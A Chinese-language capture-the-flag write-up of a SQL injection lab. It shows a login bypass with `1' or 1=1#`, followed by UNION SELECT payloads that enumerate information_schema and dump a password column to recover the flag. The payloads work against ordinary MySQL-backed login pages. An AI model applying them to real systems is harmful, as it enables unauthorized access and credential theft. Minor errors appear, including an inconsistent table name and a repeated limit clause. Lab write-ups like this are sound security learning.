靶场环境:用户登陆
页面展示:
解题过程:
步骤一:
进入靶场后看见用户名和密码框,用户名输入1' or 1=1#,密码输入1
成功登录,回显:
尝试提交CTF2{c8bffd77808d7e311653f36a7907de3a}和c8bffd77808d7e311653f36a7907de3a都失败了,说明这不是flag。
步骤二:
通过' UNION SELECT 1,2,3#尝试出有三列,而第二列会回显,故构造' UNION SELECT 1,database(),3#来获取当前数据库名(database()是内置函数,用于获取当前数据库名)
步骤三:
构造获取数据库表名的payload。
Payload1:
' union select 1,(select table_name from information_schema.tables where table_schema='geek' limit 0,1),3#返回第一个表名为 geekuser。
Payload2:
' union select 1,(select table_name from information_schema.tables where table_schema='geek' limit 1,1),3#返回第二个表名为 I0ve1ysq1。
Payload3:
' union select 1,(select table_name from information_schema.tables where table_schema='geek' limit 2,1),3#未返回表名。
所以现在我们知道了geek库里有两个表,表名分别是geekuser和l0ve1ysq1。
步骤四:
接下来我们尝试从表中获取列名,构造获取特定表的列名的payload。
' union select 1,(select column_name from information_schema.columns where table_schema='geek' and table_name='geekuser' limit 0,1),3# >id ' union select 1,(select column_name from information_schema.columns where table_schema='geek' and table_name='geekuser' limit 1,1),3# >username ' union select 1,(select column_name from information_schema.columns where table_schema='geek' and table_name='geekuser' limit 1,1),3# >password ' union select 1,(select column_name from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1' limit 0,1),3# >id ' union select 1,(select column_name from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1' limit 1,1),3# >username ' union select 1,(select column_name from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1' limit 2,1),3# >password以上payload是我列举的六个,上面三个查询geekuser表,下三个查询l0ve1ysq1表,分别返回参数 id, username, password。 我们通过更改limit n, 1 (n=0,1,2,3,4,5,6,7,8......)挨个表查里面的数据,经过一番紧张刺激的查询,成功在l0ve1ysq1表的password列的第16个字段里找到了flag。
payload:'union select 1,(select password from l0ve1ysq1 limit 15,1),3#